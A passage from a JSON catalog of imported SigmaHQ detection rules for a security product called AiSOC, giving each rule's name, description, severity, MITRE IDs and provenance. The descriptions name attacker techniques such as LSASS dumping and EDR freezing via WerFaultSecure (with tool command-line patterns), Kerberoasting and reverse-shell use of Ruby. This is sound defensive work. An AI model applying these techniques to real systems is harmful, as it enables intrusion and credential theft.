"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1edd77db-0669-4fef-9598-165bda82826d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml" } }, { "id": "sigmahq-sigma-1edff897-9146-48d2-9066-52e8d8f80a2f", "type": "detection", "name": "Suspicious Invoke-WebRequest Execution With DirectIP", "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invoke-webrequest-execution-with-directip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1edff897-9146-48d2-9066-52e8d8f80a2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" } }, { "id": "sigmahq-sigma-1eeed653-dbc8-4187-ad0c-eeebb20e6599", "type": "detection", "name": "Potential SPN Enumeration Via Setspn.EXE", "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/potential-spn-enumeration-via-setspn-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml" } }, { "id": "sigmahq-sigma-1f0489be-b496-4ddf-b3a9-5900f2044e9c", "type": "detection", "name": "Suspicious File Write to SharePoint Layouts Directory", "description": "Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.\nThis behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-write-to-sharepoint-layouts-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f0489be-b496-4ddf-b3a9-5900f2044e9c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml" } }, { "id": "sigmahq-sigma-1f0b4cac-9c81-41f4-95d0-8475ff46b3e2", "type": "detection", "name": "PPL Tampering Via WerFaultSecure", "description": 
"Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).\nThis technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.\nDistinct command line patterns help identify the specific tool:\n- WSASS usage typically shows: \"WSASS.exe WerFaultSecure.exe [PID]\" in ParentCommandLine\n- EDR-Freeze usage typically shows: \"EDR-Freeze_[version].exe [PID] [timeout]\" in ParentCommandLine\nLegitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ppl-tampering-via-werfaultsecure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f0b4cac-9c81-41f4-95d0-8475ff46b3e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse.yml" } }, { "id": "sigmahq-sigma-1f0f6176-6482-4027-b151-00071af39d7e", "type": "detection", "name": "Arbitrary File Download Via ConfigSecurityPolicy.EXE", "description": "Detects the execution of \"ConfigSecurityPolicy.EXE\", a binary part of Windows Defender used to manage settings in Windows Defender.\nUsers can configure different pilot collections for each of the co-management workloads.\nIt can be abused by attackers in order to upload or download files.", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-configsecuritypolicy-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f0f6176-6482-4027-b151-00071af39d7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_configsecuritypolicy_download_file.yml" } }, { "id": "sigmahq-sigma-1f1a8509-2cbb-44f5-8751-8e1571518ce2", "type": "detection", "name": "Suspicious Splwow64 Without Params", "description": "Detects suspicious Splwow64.exe process without any command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-splwow64-without-params.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml" } }, { "id": "sigmahq-sigma-1f1d8209-636e-4c6c-a137-781cca8b82f9", "type": "detection", "name": "WFP Filter Added via Registry", "description": "Detects 
registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wfp-filter-added-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f1d8209-636e-4c6c-a137-781cca8b82f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_wfp_filter_added.yml" } }, { "id": "sigmahq-sigma-1f2b5353-573f-4880-8e33-7d04dcf97744", "type": "detection", "name": "Sysmon Configuration Modification", "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_config_modification_status.yml" } }, { 
"id": "sigmahq-sigma-1f358e2e-cb63-43c3-b575-dfb072a6814f", "type": "detection", "name": "System and Hardware Information Discovery", "description": "Detects system information discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/system-and-hardware-information-discovery.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f358e2e-cb63-43c3-b575-dfb072a6814f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_system_info_discovery2.yml" } }, { "id": "sigmahq-sigma-1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "type": "detection", "name": "Potential Suspicious PowerShell Keywords", "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-powershell-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" } }, { "id": 
"sigmahq-sigma-1f6399cf-2c80-4924-ace1-6fcff3393480", "type": "detection", "name": "DirectorySearcher Powershell Exploitation", "description": "Enumerates Active Directory to determine computers that are joined to the domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/directorysearcher-powershell-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f6399cf-2c80-4924-ace1-6fcff3393480", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" } }, { "id": "sigmahq-sigma-1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d", "type": "detection", "name": "Remote Access Tool - Team Viewer Session Started On Linux Host", "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-team-viewer-session-started-on-linux-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml" } }, { "id": "sigmahq-sigma-1f7025a6-e747-4130-aac4-961eb47015f1", "type": "detection", "name": "HackTool - DiagTrackEoP Default Named Pipe", "description": "Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses \"SeImpersonate\" privilege.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-diagtrackeop-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f7025a6-e747-4130-aac4-961eb47015f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml" } }, { "id": "sigmahq-sigma-1f978c6a-4415-47fb-aca5-736a44d7ca3d", "type": "detection", "name": "Cisco Crypto Commands", "description": "Show when private keys are being exported from the device, or when new certificates are installed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1553.004", "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/cisco-crypto-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" } }, { "id": "sigmahq-sigma-1fb76ab8-fa60-4b01-bddd-71e89bf555da", "type": "detection", "name": "Pubprn.vbs Proxy Execution", "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pubprn-vbs-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" } }, { "id": "sigmahq-sigma-1fbc0671-5596-4e17-8682-f020a0b995dc", "type": "detection", "name": "Potential CCleanerDU.DLL Sideloading", "description": "Detects potential DLL sideloading of \"CCleanerDU.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/potential-ccleanerdu-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1fbc0671-5596-4e17-8682-f020a0b995dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_ccleaner_du.yml" } }, { "id": "sigmahq-sigma-1fc0809e-06bf-4de3-ad52-25e5263b7623", "type": "detection", "name": "Publicly Accessible RDP Service", "description": "Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/publicly-accessible-rdp-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1fc0809e-06bf-4de3-ad52-25e5263b7623", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_rdp_public_listener.yml" } }, { "id": "sigmahq-sigma-1ff315dc-2a3a-4b71-8dde-873818d25d39", "type": "detection", "name": "New BITS Job Created Via Bitsadmin", "description": "Detects the creation of a new bits job by Bitsadmin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bits-job-created-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml" } }, { "id": "sigmahq-sigma-20384606-a124-4fec-acbb-8bd373728613", "type": "detection", "name": "Suspicious Network Connection Binary No CommandLine", "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-connection-binary-no-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20384606-a124-4fec-acbb-8bd373728613", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" } }, { "id": "sigmahq-sigma-204b17ae-4007-471b-917b-b917b315c5db", "type": "detection", "name": "Greedy File Deletion Using Del", "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/greedy-file-deletion-using-del.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "204b17ae-4007-471b-917b-b917b315c5db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml" } }, { "id": "sigmahq-sigma-2053961f-44c7-4a64-b62d-f6e72800af0d", "type": "detection", "name": "Remote Event Log Recon", "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-event-log-recon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2053961f-44c7-4a64-b62d-f6e72800af0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" } }, { "id": "sigmahq-sigma-2074e137-1b73-4e2d-88ba-5a3407dbdce0", 
"type": "detection", "name": "Notepad++ Updater DNS Query to Uncommon Domains", "description": "Detects when the Notepad++ updater (gup.exe) makes DNS queries to domains that are not part of the known legitimate update infrastructure.\nThis could indicate potential exploitation of the updater mechanism or suspicious network activity that warrants further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/notepad-updater-dns-query-to-uncommon-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2074e137-1b73-4e2d-88ba-5a3407dbdce0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_gup_query_to_uncommon_domains.yml" } }, { "id": "sigmahq-sigma-207b0396-3689-42d9-8399-4222658efc99", "type": "detection", "name": "Potential Privilege Escalation To LOCAL SYSTEM", "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-to-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "207b0396-3689-42d9-8399-4222658efc99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml" } }, { "id": "sigmahq-sigma-208748f7-881d-47ac-a29c-07ea84bf691d", "type": "detection", "name": "Suspicious Outlook Child Process", "description": "Detects a suspicious process spawning from an Outlook process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-outlook-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "208748f7-881d-47ac-a29c-07ea84bf691d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-2092cacb-d77b-4f98-ab0d-32b32f99a054", "type": "detection", "name": "Potential Vivaldi_elf.DLL Sideloading", "description": "Detects potential DLL sideloading of \"vivaldi_elf.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-vivaldi-elf-dll-sideloading.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2092cacb-d77b-4f98-ab0d-32b32f99a054", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vivaldi_elf.yml" } }, { "id": "sigmahq-sigma-20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "type": "detection", "name": "Ruby Inline Command Execution", "description": "Detects execution of ruby using the \"-e\" flag. This could be used as a way to launch a reverse shell or execute live ruby code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ruby-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-20d96d95-5a20-4cf1-a483-f3bda8a7c037", "type": "detection", "name": "Add or Remove Computer from DC", "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-or-remove-computer-from-dc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_add_remove_computer.yml" } }, { "id": "sigmahq-sigma-20e5497e-331c-4cd5-8d36-935f6e2a9a07", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" } }, { "id": 
"sigmahq-sigma-20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", "type": "detection", "name": "CurrentVersion Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" } }, { "id": "sigmahq-sigma-20f754db-d025-4a8f-9d74-e0037e999a9a", "type": "detection", "name": "SES Identity Has Been Deleted", "description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. 
